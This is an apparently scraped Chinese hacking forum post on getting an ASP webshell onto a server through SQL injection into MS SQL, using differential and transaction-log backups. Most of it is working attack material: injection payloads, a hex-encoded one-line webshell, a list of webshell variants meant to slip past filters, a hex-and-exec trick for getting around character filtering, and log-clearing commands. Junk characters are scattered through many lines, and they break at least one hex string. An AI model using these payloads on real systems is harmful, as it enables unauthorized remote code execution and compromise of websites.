MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
) Q0 @, s, l1 Y5 W; o- kbackup database 库名 to disk = 'c:\ddd.bak';--
: \( h- k9 d8 R/ |5 \' p  N
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
, i; b7 N( a- O/ P; ^
3.进行差异备份
1 _7 m5 _5 i0 g) u* _: I& Qbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
2 I% v4 l  ^& ?8 X
上面
0 S  h, q) F2 d' f  V% q6 i/ p0 S- u0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
# D1 y+ k; `/ w
如下是网上常见的差异备份代码，思路一样！
6 s- Z. z- D/ @+ _# \9 `" X/ z, F) ^===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
) s' p/ p& m% C+ D" z8 F步骤:

0 x6 t5 A( C0 I2 ^7 Q9 x' Hdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
6 g( E3 C/ G( A' `/ _
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
+ p' p9 Z* }" n" U: p
% d' v+ o8 G. P1 m1 @& F9 x- n, N
& b) y+ j; [/ Q8 X" x, tinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
4 `7 J- l, @; q' Q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0 D6 G+ ~' f1 J4 v5 Q0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
9 z# n9 S: Q7 \3 X6 i0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
- X8 O9 G# s3 n8 v; Y6 C8 ~<%execute(request("a"))%>
===============================================================

我发现上面代码，有时会无效，而直接用
# r2 i8 }1 `0 k. S$ v: N
4 K' \& \1 [9 x9 U- |. C( Abackup database 库名 to disk = 'c:\ddd.bak'
) z9 U4 G/ ~, i8 Y5 l4 @
create table [dbo].[dtest] ([cmd] [image]);

$ M+ @. q7 Q6 W+ @; Ainsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
/ C" h4 i1 m1 a: L2 @: g4 d/ b, F
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
( V6 Q& a5 `6 a: G3 k- H2 Q1 ^  p9 Y
# b8 _  R" l* i3 @7 e$ h却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
% Z6 L6 Z' K! `* |* D
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
" `1 b; b9 o6 b4 s另一种log增量备份技术:

& L7 t" D: H" i' N5 j' \2 s5 S) z1 f3 H$ |';alter database null set RECOVERY FULL--
* Y7 w" Z) B' d& T7 l* f2 }. C5 U
% I5 ^4 T9 X1 g/ g8 @# D, t/ G" [';create table cmd (a image)--

+ l( [( _( A! D& |  `& r';backup log null to disk = 'f:\cmd' with init--

, r  Q1 [+ Y8 d';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 Z% k; Q9 [' }$ X3 ?
6 l( J* O8 l2 F0 a- j! a: T! b';backup log null to disk = '备份路径'--
. H! @2 Q# m1 L+ p7 P
';drop table cmd--
0 M& Z% y! v+ ~5 L9 u2 _5 N* r
6 `$ R' {; j# E: v6 K) }';alter database XXX set RECOVERY SIMPLE--

$ Y$ i5 Q% O- O2 l7 H/ ]PS:0x3C2565786563757465287265717565737428226122292
& n  j: K. I0 E! \0 @9253EDA 是一句话小马16进制转来的
& k, b* o& v8 k' T8 R
! `3 T/ X9 E+ C, ?' U0 O3 a说到一句话马，还可以有这么几种写法：

" M9 ]. T$ J- B9 L) Ma)<%%25Execute(request("a"))%%25>
! l7 A( M) H7 g! L' B' ib)<%Execute(request("a"))%>
' i. u, V  i! b- _" V' E$ h2 [c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
9 T1 V& j1 a" F1 b' T9 Xe)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
- s: l0 a& Y; T+ ]* p. L' N' _  v9 t( cg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
: C. P: @/ c8 L1 j6 t3 |- f! zh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================
( a, N' w# [& }5 F
当遇到差备过滤了/时用这个语句代替

9 C* r+ }6 h, N# J; B9 h& ~  l, D" ]declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行
1 [% P) J5 E- \7 G( F5 @4 i

' ^2 N4 K7 h' s减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
' r5 O7 E$ F, u: _8 b. @1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
5 c5 `: k; I6 X% @2
id=1;backup database model to disk='你的路径‘ with differential,format;--



SQL语句清理日志
' A8 s- L; W- L8 f注：test为数据库名
, l1 c9 b& S2 `* m
' A' o+ M  U9 m( K1 K8 \8 n--清空日志
DUMP TRANSACTION test WITH NO_LOG
( [2 b1 E# j) J& i/ V0 Y! z
3 L% c- d8 {- G) ]$ v) h9 W' J& S--截断事务日志
! D% n* h& d" f4 {BACKUP LOG test WITH NO_LOG
& U8 K! I9 T1 \" c. {, T- O* p6 [$ y
--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
" K8 [$ V+ K, W! W3 J, |: lSelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'